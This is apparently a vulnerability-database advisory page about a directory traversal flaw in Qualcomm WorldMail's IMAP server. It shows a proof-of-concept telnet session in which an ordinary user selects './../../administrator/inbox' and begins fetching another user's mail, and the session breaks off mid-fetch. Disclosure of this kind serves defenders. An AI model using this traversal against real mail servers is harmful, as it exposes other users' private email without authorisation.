• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Qualcomm Worldmail Server Directory Traversal Vulnerability

No exploit is required:

The following proof of concept example is available:

c:\> telnet 1.2.3.4 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed

2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}